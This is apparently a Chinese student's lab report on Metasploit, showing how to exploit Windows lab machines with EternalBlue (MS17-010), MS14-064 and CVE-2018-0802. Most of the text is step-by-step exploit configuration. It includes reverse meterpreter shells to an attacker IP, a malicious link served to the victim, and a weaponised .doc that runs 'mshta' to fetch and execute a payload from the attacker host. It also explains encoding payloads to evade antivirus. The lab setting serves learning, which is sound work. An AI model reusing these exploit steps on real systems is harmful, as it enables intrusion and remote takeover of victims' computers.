标签:不同 enc 编码 权限 操作权限 如何 限制 用户 exe
本次实验主要是掌握metasploit的基本应用,主要是按三种思路来进行实验,比较接近正常情况下的漏洞利用。同时在漏洞利用过程中出现了我们听过的漏洞和常用软件的漏洞利用。
主要实验内容:
ms17-010漏洞进行利用MS14-064漏洞入侵win7系统CVE-2018-0802漏洞进行的攻击msfconsole进入到控制台msf > use exploit/windows/smb/ms17_010_eternalblue,然后就是设置靶机ip的命令set rhost 192.168.92.130。然后继续对payload进行配置,配置攻击机监听返回会话,输入命令set payload windows/x64/meterpreter/reverse_tcp设置payload,然后设置 set lhost 192.168.92.128设定攻击机的监听,最后exploit进行攻击。
可以看到,成功获得靶机系统操作。
use exploit/windows/browser/ms14_064_ole_code_execution设置MS14-064漏洞利用模块set payload windows/meterpreter/reverse_tcp设置payloadset SRVHOST 192.168.92.128设置攻击机监听set AllowPowerShellPrompt true这个是因为需要用到windows中自带的powershellset lport 5103设置端口set lhost 192.168.92.128设置攻击机ip
exploit开始,生成网址链接http://192.168.92.128:8080/R8TaLT复制链接,靶机在浏览器中输入链接后,攻击机攻击成功。
use exploit/windows/misc/hta_serverset LHOST 192.168.92.128设置攻击机set LPORT 5103set SRVHOST 192.168.92.128set target 1设置目标(由于是x64所以是1)
使用exploit生成hta链接
从网上下载关于此漏洞poc文件,使用python RTF_11882_0802.py -c "mshta http://192.168.92.128:8080/sBeLshqkj59n.hta" -o Password5103.doc生成doc文件
将doc文件拷到我的win10中,打开文件
这边kali成功获得了我这的操作权限。
-进入控制台直接可以输入search portscan来看看我们可以用哪些辅助模块来进行端口扫描
这里用的还是auxiliary/scanner/portscan/tcp 模块
然后设置一下目标ip就可以开始端口扫描了
这里实际上我扫过我的win7发现半天没反应,后来发现跟防火墙有关系。
exploit是攻击的一套运行模块,负责基于核心模块给出传输及功能实现。payload是攻击的核心,在攻击中主要起做用的部分,针对不同的漏洞利用不同的paylaod进行攻击。攻击时放入到靶机中执行。encode 也是msf的一个模块,这这个模块主要负责编码,将payload处理成目标机可执行,去掉坏字符,不会被检测到(免杀)的代码。本次实验确实感触很深,由于做实验时间较晚,因此在做实验的时候在网上找了不少关于漏洞的资料,也让自己开了开眼,发现好多以前听说过的知名网安事件所利用的漏洞在自己的操作下也可以成功实施攻击。不过不少漏洞在安全人员的辛苦工作下还是把漏洞限制在了特定的软件或操作系统版本中才能被利用。在进行客户端攻击中,发现自己常用的软件客户端的漏洞被利用也非常的令人后背发凉,不过好在是也会被杀软查出来,但是针对0day漏洞还是很难被发现,因此,我们还是得好好钻研知识,提高安全意识,当然挖掘漏洞也是我们应该认真去尝试的!
在我看来,目前在实战方面还需要考虑的就是我们如何去找到别人的用户端,然后从外网想办法去绕过防火墙来进行攻击。但是事实上对于不同的安全系统所采用的安全等级肯定不一样(我这里的意思是因人而异)如果你要进入到跟你同一网段而且平时没什么安全意识的人的电脑中感觉还是蛮容易的。。。。(但是这样是会违法的!)
标签:不同 enc 编码 权限 操作权限 如何 限制 用户 exe
原文地址:https://www.cnblogs.com/8cloud33zzk/p/10745825.html
